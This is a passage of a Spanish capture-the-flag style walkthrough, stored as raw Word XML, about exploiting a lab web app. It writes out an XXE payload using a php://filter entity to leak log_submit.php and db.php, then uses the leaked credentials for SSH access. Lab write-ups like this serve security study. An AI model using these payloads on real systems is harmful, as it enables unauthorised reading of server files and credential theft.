      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00D41F0F">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>="1.0" encoding="ISO-8859-1"?&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E3E7D61" w14:textId="77777777" w:rsidR="00D41F0F" w:rsidRPr="00D41F0F" w:rsidRDefault="00D41F0F" w:rsidP="00D41F0F">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D41F0F">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;!DOCTYPE foo [ &lt;!ENTITY </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00D41F0F">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>xxe</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00D41F0F">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> SYSTEM </w:t>
      </w:r>
      <w:r w:rsidRPr="00D41F0F">
        <w:rPr>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>"php://filter/read=convert.base64-encode/resource=log_submit.php"</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00D41F0F">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>&gt; ]</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00D41F0F">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E5CCE1A" w14:textId="77777777" w:rsidR="00D41F0F" w:rsidRPr="00D41F0F" w:rsidRDefault="00D41F0F" w:rsidP="00D41F0F">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D41F0F">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00D41F0F">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:tab/>
        <w:t>&lt;</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00D41F0F">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>bugreport</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00D41F0F">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="395B8972" w14:textId="77777777" w:rsidR="00D41F0F" w:rsidRPr="00D41F0F" w:rsidRDefault="00D41F0F" w:rsidP="00D41F0F">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D41F0F">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00D41F0F">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:tab/>
        <w:t>&lt;title&gt;&amp;</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00D41F0F">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>xxe</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00D41F0F">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>;&lt;/title&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07B4B7A1" w14:textId="77777777" w:rsidR="00D41F0F" w:rsidRPr="00D41F0F" w:rsidRDefault="00D41F0F" w:rsidP="00D41F0F">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D41F0F">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00D41F0F">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:tab/>
        <w:t>&lt;</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00D41F0F">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>cwe</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00D41F0F">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>&gt;test&lt;/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00D41F0F">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>cwe</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00D41F0F">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AF54D77" w14:textId="77777777" w:rsidR="00D41F0F" w:rsidRPr="00D41F0F" w:rsidRDefault="00D41F0F" w:rsidP="00D41F0F">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D41F0F">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00D41F0F">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:tab/>
        <w:t>&lt;</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00D41F0F">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>cvss</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00D41F0F">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>&gt;test&lt;/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00D41F0F">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>cvss</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00D41F0F">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D00D64B" w14:textId="6FA9ADFC" w:rsidR="00D41F0F" w:rsidRPr="00D41F0F" w:rsidRDefault="00D41F0F" w:rsidP="00D41F0F">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D41F0F">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00D41F0F">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:tab/>
        <w:t>&lt;reward&gt;test&lt;/reward&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C557534" w14:textId="6157176D" w:rsidR="00173B51" w:rsidRDefault="00577C2D" w:rsidP="00173B51">
      <w:r w:rsidRPr="00577C2D">
        <w:t xml:space="preserve">Y </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">toda esa cadena lo mandamos como base64 en la variable data (tiene que estar </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>url</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>encodeado</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11AC9685" w14:textId="683C9CE9" w:rsidR="00577C2D" w:rsidRDefault="00577C2D" w:rsidP="00577C2D">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r w:rsidRPr="00577C2D">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="785C7234" wp14:editId="28E854B9">
            <wp:extent cx="4668959" cy="2664995"/>
            <wp:effectExtent l="0" t="0" r="0" b="2540"/>
            <wp:docPr id="9031148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14842" name="Imagen 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4631" cy="266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EAA2" w14:textId="3238DDCF" w:rsidR="00577C2D" w:rsidRDefault="007659EE" w:rsidP="00173B51">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Si copiamos la cadena que está devolviendo en el response como base64 -d el resultado es el siguiente:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="460FC589" w14:textId="795CA6F7" w:rsidR="007659EE" w:rsidRDefault="007659EE" w:rsidP="00173B51">
      <w:r w:rsidRPr="007659EE">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="727E4CD6" wp14:editId="38A8C0C4">
            <wp:extent cx="5400040" cy="1623060"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="16096603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60316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0274" w14:textId="77777777" w:rsidR="007659EE" w:rsidRDefault="007659EE" w:rsidP="00173B51"/>
    <w:p w14:paraId="0E3370D6" w14:textId="662C19B9" w:rsidR="007659EE" w:rsidRDefault="007659EE" w:rsidP="00173B51">
      <w:r>
        <w:t xml:space="preserve">Se logra visualizar que no hay mucha información en el </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>log_submit.php</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">, pero ¿y si hubiera algún otro fichero </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>php</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> donde podamos obtener más información? Entonces es momento de utilizar nuevamente la herramienta de </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Wfuzz</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00D2645F">
        <w:t xml:space="preserve"> Le agregamos </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00D2645F">
        <w:t>el</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00D2645F">
        <w:t xml:space="preserve"> .</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00D2645F">
        <w:t>php</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00D2645F">
        <w:t xml:space="preserve"> al final para buscar solamente archivos .</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00D2645F">
        <w:t>php</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00D2645F">
        <w:t xml:space="preserve"> existentes.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03931DC0" w14:textId="3BD94FC9" w:rsidR="007659EE" w:rsidRDefault="00661DF7" w:rsidP="00173B51">
      <w:r w:rsidRPr="00661DF7">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1AD69F33" wp14:editId="790CB4B0">
            <wp:extent cx="5395239" cy="619125"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="105556792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67926" name="Imagen 1" descr="Interfaz de usuario gráfica, Texto&#10;&#10;Descripción generada automáticamente"/>
                    <pic:cNvPicPr/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9217" b="89862" l="5330" r="96701">
                                  <a14:foregroundMark x1="5330" y1="47005" x2="8376" y2="47926"/>
                                  <a14:foregroundMark x1="92703" y1="31336" x2="96701" y2="4193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896" t="7282" r="959" b="11761"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5519615" cy="63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F7989" w14:textId="77777777" w:rsidR="00D2645F" w:rsidRDefault="00D2645F" w:rsidP="00173B51"/>
    <w:p w14:paraId="3EE773EB" w14:textId="0318FE19" w:rsidR="00D2645F" w:rsidRDefault="00D2645F" w:rsidP="00173B51">
      <w:r>
        <w:t xml:space="preserve">Y en efecto, tenemos dos resultados: portal y </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>db</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A566A73" w14:textId="03BF648E" w:rsidR="00577C2D" w:rsidRPr="00577C2D" w:rsidRDefault="00661DF7" w:rsidP="00173B51">
      <w:r w:rsidRPr="00661DF7">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="60814612" wp14:editId="3F50567B">
            <wp:extent cx="5400040" cy="1026160"/>
            <wp:effectExtent l="0" t="0" r="0" b="2540"/>
            <wp:docPr id="944151840" name="Imagen 1" descr="Imagen de la pantalla de un celula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51840" name="Imagen 1" descr="Imagen de la pantalla de un celular&#10;&#10;Descripción generada automáticamente con confianza baj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BFB2" w14:textId="77777777" w:rsidR="002952EF" w:rsidRDefault="002952EF" w:rsidP="00FA6809"/>
    <w:p w14:paraId="4338EE20" w14:textId="47DFDC89" w:rsidR="00D2645F" w:rsidRDefault="00D2645F" w:rsidP="00FA6809">
      <w:r>
        <w:t xml:space="preserve">Hacemos el mismo proceso que hicimos para leer el </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>log_submit.php</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">, pero ahora con </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>db.php</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> y lo mandamos como base64.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3512ADE7" w14:textId="77777777" w:rsidR="00D2645F" w:rsidRPr="00D41F0F" w:rsidRDefault="00D2645F" w:rsidP="00D2645F">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D41F0F">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>&lt;?</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00D41F0F">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>xml  version</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00D41F0F">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>="1.0" encoding="ISO-8859-1"?&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28A653E8" w14:textId="6376F1F0" w:rsidR="00D2645F" w:rsidRPr="00D41F0F" w:rsidRDefault="00D2645F" w:rsidP="00D2645F">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D41F0F">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;!DOCTYPE foo [ &lt;!ENTITY </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00D41F0F">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>xxe</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00D41F0F">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> SYSTEM </w:t>
      </w:r>
      <w:r w:rsidRPr="00D41F0F">
        <w:rPr>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>"</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00D41F0F">
        <w:rPr>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>php</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00D41F0F">
        <w:rPr>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>://filter/read=convert.base64-encode/resource=</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>db</w:t>
      </w:r>
      <w:r w:rsidRPr="00D41F0F">
        <w:rPr>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.php</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00D41F0F">
        <w:rPr>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>"</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00D41F0F">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>&gt; ]</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00D41F0F">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FEDAEB8" w14:textId="77777777" w:rsidR="00D2645F" w:rsidRPr="00D41F0F" w:rsidRDefault="00D2645F" w:rsidP="00D2645F">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D41F0F">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00D41F0F">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:tab/>
        <w:t>&lt;</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00D41F0F">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>bugreport</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00D41F0F">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C548E9B" w14:textId="77777777" w:rsidR="00D2645F" w:rsidRPr="00D41F0F" w:rsidRDefault="00D2645F" w:rsidP="00D2645F">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D41F0F">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00D41F0F">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:tab/>
        <w:t>&lt;title&gt;&amp;</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00D41F0F">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>xxe</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00D41F0F">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>;&lt;/title&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42EF87E8" w14:textId="77777777" w:rsidR="00D2645F" w:rsidRPr="00D41F0F" w:rsidRDefault="00D2645F" w:rsidP="00D2645F">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D41F0F">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00D41F0F">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:tab/>
        <w:t>&lt;</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00D41F0F">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>cwe</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00D41F0F">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>&gt;test&lt;/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00D41F0F">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>cwe</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00D41F0F">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A3DA093" w14:textId="77777777" w:rsidR="00D2645F" w:rsidRPr="00D41F0F" w:rsidRDefault="00D2645F" w:rsidP="00D2645F">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D41F0F">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00D41F0F">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:tab/>
        <w:t>&lt;</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00D41F0F">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>cvss</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00D41F0F">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>&gt;test&lt;/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00D41F0F">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>cvss</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00D41F0F">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29462AAE" w14:textId="77777777" w:rsidR="00D2645F" w:rsidRDefault="00D2645F" w:rsidP="00D2645F">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D41F0F">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00D41F0F">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:tab/>
        <w:t>&lt;reward&gt;test&lt;/reward&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="028D5DA1" w14:textId="77777777" w:rsidR="00D2645F" w:rsidRPr="00D41F0F" w:rsidRDefault="00D2645F" w:rsidP="00D2645F">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="61711B4A" w14:textId="1D0F1045" w:rsidR="00D2645F" w:rsidRPr="00D2645F" w:rsidRDefault="00D2645F" w:rsidP="00FA6809">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D2645F">
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="65EFD7B1" wp14:editId="4BF247B1">
            <wp:extent cx="5400040" cy="2013625"/>
            <wp:effectExtent l="0" t="0" r="0" b="5715"/>
            <wp:docPr id="1015812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12030" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill rotWithShape="1">
                    <a:blip r:embed="rId50"/>
                    <a:srcRect b="34671"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5400040" cy="20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72D96" w14:textId="77777777" w:rsidR="000C007C" w:rsidRDefault="000C007C" w:rsidP="00FA6809">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3B20CB84" w14:textId="53AFDB43" w:rsidR="005E1098" w:rsidRDefault="005E1098" w:rsidP="00FA6809">
      <w:r w:rsidRPr="005E1098">
        <w:t>Ahora visualizaremos el contenido d</w:t>
      </w:r>
      <w:r>
        <w:t>e la respuesta en base64.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49F83B1C" w14:textId="1B037014" w:rsidR="005E1098" w:rsidRDefault="005E1098" w:rsidP="00FA6809">
      <w:r w:rsidRPr="005E1098">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6DEF6CB4" wp14:editId="1814ABC9">
            <wp:extent cx="5400040" cy="675005"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="18303177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1776" name="Imagen 1" descr="Interfaz de usuario gráfica, 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CFB8" w14:textId="77777777" w:rsidR="005E1098" w:rsidRDefault="005E1098" w:rsidP="00FA6809"/>
    <w:p w14:paraId="4BA1A654" w14:textId="7CE467F3" w:rsidR="00C7172F" w:rsidRDefault="00C7172F" w:rsidP="00FA6809">
      <w:r>
        <w:t xml:space="preserve">Recordamos que teníamos el puerto 22-ssh y el 80-http abierto. Entonces, probaremos si esas credenciales son válidas si ingresamos por </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>ssh</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00923356">
        <w:t xml:space="preserve"> Además, recordamos que teníamos el usuario </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00923356">
        <w:t>development</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00923356">
        <w:t xml:space="preserve">, por lo que si no funciona con el usuario </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00923356">
        <w:t>admin</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00923356">
        <w:t xml:space="preserve"> podríamos probar con el otro.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B0637CE" w14:textId="3495E81B" w:rsidR="00923356" w:rsidRDefault="00923356" w:rsidP="00923356">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r w:rsidRPr="00923356">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="75F612AC" wp14:editId="610539B4">
            <wp:extent cx="2349281" cy="2334639"/>
            <wp:effectExtent l="0" t="0" r="0" b="8890"/>
            <wp:docPr id="9226861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86119" name="Imagen 1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65463" cy="23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8444" w14:textId="0447363A" w:rsidR="00923356" w:rsidRDefault="00923356" w:rsidP="00FA6809">
      <w:r>
        <w:t>Y en efecto, tenemos acceso.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A49187F" w14:textId="4DD2FE2F" w:rsidR="00C7172F" w:rsidRDefault="00C4061D" w:rsidP="00FA6809">
      <w:r>
        <w:t>Ahora si visualizamos los ficheros vemos lo siguiente:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4679EFCD" w14:textId="2BADFEFA" w:rsidR="00C4061D" w:rsidRDefault="00C4061D" w:rsidP="006F5791">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r w:rsidRPr="00C4061D">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4D1B880C" wp14:editId="343F1C49">
            <wp:extent cx="4083260" cy="1085906"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1458638011" name="Imagen 1" descr="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38011" name="Imagen 1" descr="Texto, Chat o mensaje de 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1D5C" w14:textId="3287DDA0" w:rsidR="008F15EB" w:rsidRPr="006E2852" w:rsidRDefault="00C4061D" w:rsidP="00C4061D">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
